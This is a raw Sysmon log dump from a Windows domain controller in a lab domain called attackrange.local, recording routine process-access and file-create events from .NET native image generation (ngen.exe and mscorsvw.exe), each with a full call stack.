13:46:27.390{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9133-6005-F501-00000000A301}4860C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:27.343{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9133-6005-F401-00000000A301}4832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.343{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9133-6005-F401-00000000A301}4832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:27.343{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9133-6005-F401-00000000A301}4832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:27.281{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9133-6005-F301-00000000A301}3460C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.265{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9133-6005-F301-00000000A301}3460C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:27.265{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9133-6005-F301-00000000A301}3460C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:27.218{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9133-6005-F201-00000000A301}1040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.203{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9133-6005-F201-00000000A301}1040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:27.203{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9133-6005-F201-00000000A301}1040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:27.140{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9133-6005-F101-00000000A301}3900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.140{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9133-6005-F101-00000000A301}3900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:27.140{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9133-6005-F101-00000000A301}3900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:27.093{59A5CD1D-9133-6005-F001-00000000A301}2492C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\9bc-0\Microsoft.VisualC.dll2021-01-18 13:46:27.093 10341000x80000000000000006129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:27.062{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9133-6005-F001-00000000A301}2492C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.062{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9133-6005-F001-00000000A301}2492C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:27.062{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9133-6005-F001-00000000A301}2492C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.031{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9133-6005-EF01-00000000A301}2484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.031{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9133-6005-EF01-00000000A301}2484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.015{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9133-6005-EF01-00000000A301}2484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:28.937{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9134-6005-0002-00000000A301}2828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:28.937{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9134-6005-0002-00000000A301}2828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:28.937{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9134-6005-0002-00000000A301}2828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:28.452{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9134-6005-FF01-00000000A301}3796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 